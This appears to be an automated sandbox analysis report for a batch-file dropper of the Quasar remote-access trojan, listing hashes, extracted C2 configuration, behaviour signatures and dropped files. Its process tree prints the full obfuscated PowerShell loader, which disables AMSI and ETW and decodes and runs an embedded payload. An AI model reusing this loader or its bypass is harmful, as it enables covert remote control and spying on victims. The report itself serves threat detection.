Overview

overview

10

Static

static

1

Client-built.exe.bat

windows10-ltsc 2021-x64

10

Client-built.exe.bat

windows11-21h2-x64

10

Analysis

  • max time kernel
    111s
  • max time network
    122s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    25-11-2024 23:23

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Client-built.exe.bat

  • Size

    4.2MB

  • MD5

    8eecabd958ac81525f071d8f8f9c5b4f

  • SHA1

    293f0625c5eafc5193d582244603d5981c5c6ef5

  • SHA256

    8c0ed0a2488582fa19983c458e298b76bad3f81402da794f55d4b5adbf101db3

  • SHA512

    3ecc3d4a22fd945777eea8ca732c3009ca65bc0e44ea388e0602db500da2f20ef2d465ef107a79595ea3f5c89eccbf634fcbb7fb46197a8513a6317450b80704

  • SSDEEP

    49152:B78bwAn48Himx5yYfP0z1TjhIkgbN+7fSnndvcW:a

Score
10/10
quasarfrexecutionspywaretrojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

fr

C2

kdotisbetterfr.airdns.org:61875

Mutex

de3f242e-9b27-4bcc-b108-2b89973fa679

Attributes
  • encryption_key

    A9E1D2CBD6699561DDC6C38CE5B7E79D283DC83E

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar family
    quasar
  • Quasar payload 1 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client-built.exe.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:384
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -exec bypass -C "$kdot_file='C:\Users\Admin\AppData\Local\Temp\Client-built.exe.bat';${kdoTkq`Gent`Obgn}=([SyStEm.TexT.eNcODING]::uTF8.GETstrING((83, 121, 115, 116, 101, 109, 46, 77, 97, 110, 97, 103, 101, 109, 101, 110, 116, 46)) + [SYStEm.TeXT.ENCoDING]::UTf8.geTstrINg((65, 117, 116, 111, 109, 97, 116, 105, 111, 110, 46, 65, 109, 115, 105, 85)) + [SyStem.teXT.ENcoDIng]::uTF8.geTSTRinG([SYsTEM.cOnvErT]::FRoMbase64StRing('dGlscw==')));${kdOtmftjtoczLt}=([SySTEM.TEXT.encoDing]::UTF8.gEtsTrING([SyStEm.ConVerT]::frOMBASe64stRing('YW1zaUluaXRGYWlsZWQ=')));$kdOtrBXZtJMXwe=[REF].aSSEmBly;${k`D`OtinuLtqZ`Mj`I}=$kdotrBXztjMxwe.GettyPE(${k`D`OtkqgeNto`B`Gn});${KDotvlLHOtMVOT}=${kDO`Tinultqz`MJI}.GEtfiEld(${k`Dotmf`TJtOCZLt},([syStEm.Text.ENcoDiNG]::Utf8.getStrING([SyStEm.CONVeRt]::fRomBase64STriNG('Tm9uUHVibGljLFN0YXRpYw=='))));${kdotv`Ll`H`Otm`Vot}.SETVAluE($nULL,(([MaTh]::roUnd([maTH]::Pi) -eq (4583 - 4580))));([REFLEcTIon.aSSembly]::LOaDwITHpaRtIAlnAMe(((([systeM.tEXT.EnCoDinG]::UTf8.gEtSTRING((0x53, 0x79, 0x73, 0x74, 0x65, 0x6d, 0x2e, 0x43, 0x6f, 0x72, 0x65)))))).geTtyPe(((([sYStEm.TeXT.encodING]::utf8.GETsTRINg((0x53, 0x79, 0x73, 116, 101, 109, 46, 68, 105, 0x61, 103, 110, 111, 115, 0x74, 0x69, 99, 115, 0x2e, 0x45)) + [SystEM.TEXt.EncOdInG]::UTF8.GEtstRINg([sysTEM.coNVert]::frOMbAse64stRInG('dmVudGluZy5FdmVudFByb3ZpZGVy')))))).gEtFIELD(((([sYStem.teXt.EnCodIng]::uTf8.gETsTRING((0x6d, 0x5f, 101, 110)) + [sYstEm.Text.ENcodInG]::UTf8.getsTRinG([sYSTeM.cONVERT]::FromBase64STring('YWJsZQ==')) + [system.text.EnCOdiNG]::utF8.GETStRinG((100))))),((([sySTEM.tExT.eNcodInG]::Utf8.GeTstrinG((0x4e, 0x6f, 0x6e, 0x50, 0x75, 0x62, 0x6c, 0x69, 0x63, 0x2c, 0x49, 0x6e, 0x73, 0x74, 0x61, 0x6e, 0x63, 0x65)))))).seTvALue([ref].AssEMBlY.gETtyPE(((([sysTem.tEXT.ENCOdiNg]::utF8.gETString((0x53, 121, 115, 0x74, 0x65, 109, 0x2e, 77, 97, 110, 0x61, 0x67, 0x65, 0x6d, 0x65, 110, 0x74, 46, 65, 0x75, 0x74, 0x6f, 0x6d, 0x61, 0x74, 105, 0x6f)) + [SyStEm.TEXT.eNcoding]::UtF8.getStRING((0x6e, 0x2e, 0x54, 0x72, 0x61, 0x63, 0x69, 0x6e, 0x67, 0x2e, 0x50, 0x53, 0x45, 0x74, 0x77, 0x4c, 0x6f, 0x67, 0x50, 0x72, 0x6f, 0x76, 0x69, 0x64, 0x65, 0x72)))))).getfIEld(((([SYsTeM.tEXt.EncodIng]::utF8.getStriNg((0x65, 116, 0x77, 80, 0x72, 111, 118, 0x69, 0x64, 0x65, 0x72))))),((([syStem.TexT.enCodING]::uTf8.GETstrING([SystEM.CoNveRT]::FromBAse64StrIng('Tm9uUHVibGljLFN0YXRpYw==')))))).GEtVALUe($nUll),0));.([char](((-1880 -Band 3977) + (-1880 -Bor 3977) - 4958 + 2966))+[char](((-5904 -Band 9157) + (-5904 -Bor 9157) + 6302 - 9454))+[char](((-21634 -Band 6735) + (-21634 -Bor 6735) + 8883 + 6136))) ([teXt.EncOdiNG]::utf8.GeTsTRING([COnvERt]::FROmbaSE64striNg((.([char]((10951 - 6660 - 8049 + 3829))+[char]((14226 - 7595 - 9122 + 2592))+[char]((24730 - 8863 - 9864 - 5887))+[char](((-5132 -Band 1756) + (-5132 -Bor 1756) + 8940 - 5519))+[char](((1940 -Band 2956) + (1940 -Bor 2956) - 6449 + 1620))+[char](((-6729 -Band 3763) + (-6729 -Bor 3763) - 545 + 3622))+[char]((-4095 - 1385 + 928 + 4662))+[char]((-6662 - 1701 + 5421 + 3058))+[char](((-2558 -Band 9162) + (-2558 -Bor 9162) - 7234 + 731))+[char](((2844 -Band 3096) + (2844 -Bor 3096) - 1177 - 4653))+[char](((-16140 -Band 2909) + (-16140 -Bor 2909) + 8371 + 4976))) $kDot_file -raw | .([char]((6554 - 7231 + 5942 - 5182))+[char](((3079 -Band 9477) + (3079 -Bor 9477) - 9412 - 3043))+[char](((-4179 -Band 8133) + (-4179 -Bor 8133) - 5058 + 1212))+[char]((19429 - 6371 - 4893 - 8064))+[char](((-8637 -Band 6960) + (-8637 -Bor 6960) + 3708 - 1932))+[char]((-9407 - 2390 + 4965 + 6948))+[char]((3773 - 784 + 6348 - 9292))+[char](((-17685 -Band 7650) + (-17685 -Bor 7650) + 6965 + 3153))+[char]((-1848 - 3742 + 3489 + 2217))+[char](((-15472 -Band 7425) + (-15472 -Bor 7425) - 1465 + 9626))+[char]((1512 - 5248 + 8485 - 4644))+[char](((-10605 -Band 4896) + (-10605 -Bor 4896) + 4426 + 1393))+[char](((3437 -Band 468) + (3437 -Bor 468) + 5827 - 9629))) (([sYSTEm.teXT.eNCODiNG]::utf8.gEtstRing(58)) + ([sySteM.TeXT.ENcodiNg]::uTF8.gETstriNG([sYSTem.convERt]::fRomBasE64StRing('OktET1Q6OiguKik='))))).MaTcheS.GrOUPS[1].vAluE)))"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2096
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tqncah4t\tqncah4t.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3388
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9B07.tmp" "c:\Users\Admin\AppData\Local\Temp\tqncah4t\CSCCEDBE81813A4530AE21B880AD24D011.TMP"
          4⤵
            PID:4516

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\RES9B07.tmp
      Filesize

      1KB

      MD5

      f971046ee94887ec780df23a613aa682

      SHA1

      a6a6f7f8c023795297118716ed8b280efd40a632

      SHA256

      ae34ae8f39370b8226724f6eda9a620a68a7cf756e914afce141d24bec749567

      SHA512

      a218b39db2cea8ab2a5ca7d8b2980f876dda8bbec9157db9076c89dbb8f85b04859bcb87a9905b7191562623168b2fcac3f65bb08a8dc9c34daf51c875e3b0ae

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qasxmxx3.bnh.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\tqncah4t\tqncah4t.dll
      Filesize

      8KB

      MD5

      1599b844ec9fa4d9333aa34292be122b

      SHA1

      d257e35c64cbb7fcd4fb4de7c18b1c2333adcc7d

      SHA256

      f95e1b765fddea3bbdc184cddaf5434b81b4662e65856e0ee87401f5703ea999

      SHA512

      edb93215f31b9b72db33f06bf4b8d580b439996981169c6ab911f53763806ff8e72af049f93c5c7ff5226ab7d86d19d4fdd0b9e97650ff3bac7c8636e3cef011

      Download Submit

    • \??\c:\Users\Admin\AppData\Local\Temp\tqncah4t\CSCCEDBE81813A4530AE21B880AD24D011.TMP
      Filesize

      652B

      MD5

      049d86b78f1c4c4d5a7b86b5447d6d43

      SHA1

      8c9b2663d670ecbd661f83832c08947110f6ff7a

      SHA256

      6207b78c5a09cc5a2f50fc71879551b87f2e51c52b51de6c95608c07520715c5

      SHA512

      6383133a57ec2148564f17ad6618449619dee2becbb0e977f2eef804e887524fdb1afbfa035f2cae6f9e66900b06f21209c89b99c37090e678028838c60e0f8c

      Download Submit

    • \??\c:\Users\Admin\AppData\Local\Temp\tqncah4t\tqncah4t.0.cs
      Filesize

      11KB

      MD5

      2baccf8bd40aaee5659a70165d301596

      SHA1

      52f6af554b3df57db81005dd6360f4bc39b93531

      SHA256

      6c6ca5f865d9346cd32d84e0122d1bf08051d8b53c47208cef44bd2bb6133884

      SHA512

      dfbe57879f918c029dc628cc27961d63eca88104e8e7fb3aba8c2d1696419d5010c2dfc7e690669835fa50a0344f1ec5f60f714db95112b18c8524e87d1bb51a

      Download Submit

    • \??\c:\Users\Admin\AppData\Local\Temp\tqncah4t\tqncah4t.cmdline
      Filesize

      369B

      MD5

      aab34c3dbfe361d74ca08bf7732d55a9

      SHA1

      bcdc643e3cf2023b5c93f54912c1071a3a656cff

      SHA256

      066b123bd05f24e857d31c37d3227dad698ab57ac3e3ffc9e88bcf530e9e851d

      SHA512

      182b2bc596a85db2daa81353e229daa597439f27947541e1d6c3240717554e13e61d757c05022ceb7d81c5cb81ba35f4baa9c23308fe55a688a05cbc8350c140

      Download Submit

    • memory/2096-13-0x00007FFEC6C40000-0x00007FFEC7702000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2096-28-0x00007FFEC6C43000-0x00007FFEC6C45000-memory.dmp

      Filesize

      8KB

      Download

    • memory/2096-12-0x00007FFEC6C40000-0x00007FFEC7702000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2096-11-0x00007FFEC6C40000-0x00007FFEC7702000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2096-6-0x00000193A7F60000-0x00000193A7F82000-memory.dmp

      Filesize

      136KB

      Download

    • memory/2096-26-0x00000193AA670000-0x00000193AA678000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2096-29-0x00007FFEC6C40000-0x00007FFEC7702000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2096-0-0x00007FFEC6C43000-0x00007FFEC6C45000-memory.dmp

      Filesize

      8KB

      Download

    • memory/2096-30-0x00007FFEC6C40000-0x00007FFEC7702000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2096-31-0x00007FFEC6C40000-0x00007FFEC7702000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2096-32-0x00000193AA7E0000-0x00000193AAB04000-memory.dmp

      Filesize

      3.1MB

      Download

    • memory/2096-33-0x00000193AAC10000-0x00000193AAC60000-memory.dmp

      Filesize

      320KB

      Download

    • memory/2096-34-0x00000193AAD90000-0x00000193AAE42000-memory.dmp

      Filesize

      712KB

      Download

    • memory/2096-35-0x00000193ABEC0000-0x00000193AC082000-memory.dmp

      Filesize

      1.8MB

      Download